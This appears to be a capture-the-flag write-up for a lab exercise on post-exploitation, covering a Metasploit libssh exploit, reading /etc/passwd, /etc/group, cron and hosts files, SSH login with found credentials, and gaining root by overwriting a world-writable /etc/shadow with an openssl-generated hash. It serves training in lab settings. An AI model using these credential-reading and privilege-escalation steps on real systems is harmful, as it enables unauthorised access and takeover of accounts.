# CTF 1 - Post-Exploitation

***

### Question 1

> The file that stores user account details is worth a closer look. (target1.ine.local)

After doing an Nmap scan on the target, we can see that port 22 is open and running `libssh` for which there is a Metasploit module available to exploit it. When using it, make sure you set up the normal options as well as set the `SPAWN_PTY` option to true.

To get the flag, we need to enumerate account details which we can do via `cat /etc/passwd`.

### Question 2

> User groups might reveal more than you expect.

To enumerate the groups, we can run `cat /etc/group`.

### Question 3

> Scheduled tasks often have telling names. Investigate the Cron jobs to uncover the secret.

To look at the Cron jobs running, we can run `ls -al /etc/cron*` or navigate to the `/etc/cron.d` directory and view the contents.

### Question 4

> DNS configurations might point you in the right direction. Also, explore the home directories for stored credentials.

To view the DNS configurations, run `cat /etc/resolve.conf` but nothing is valuable here. However, it does point to the `/etc/hosts` file which we view via `cat /etc/hosts`.

### Question 5

> Use the discovered credentials to gain higher privileges and explore the root's home directory on target2.ine.local.

First, navigate to the /home/user directory and list out the content to find `credentials.txt`. Then, perform an Nmap scan on target 2. We can see that port 22 is open and SSH is running. We can login using the credentials with the command:

```
ssh john@target2.ine.local
```

Now, that we are, we need enumerate our privileges and we don't have root access. We can check for weak file permissions using the following command:

```
find / -not -type l -perm -o+w
```

We can see that we can access the `/etc/shadow` file. We can change the root user's password to gain access as root. We can generate the required hashed password using the following command:

```
openssl passwd -1 -salt abc password123
```

Feel free to change the 'password' to whatever you wish. Now copy the string generated and replace the Asterix in the `/etc/shadow` file. You can do so by open the `/etc/shadow` file using Nano (a text-editor similar to vim). It should look like this:

<figure><img src="https://3152412622-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSLCRGfQP6VPqx00Hm9Ye%2Fuploads%2FFzRpGpCYWVL1BypACzx1%2F%7B6FCB7B4C-8247-40FB-B636-0843E05AF3EE%7D.png?alt=media&#x26;token=5eafc853-e222-4fa7-b488-7d78eb0663ec" alt=""><figcaption></figcaption></figure>

Then type `su` and you should have root access. Now navigate to the root directory and list out the contents to get the last flag!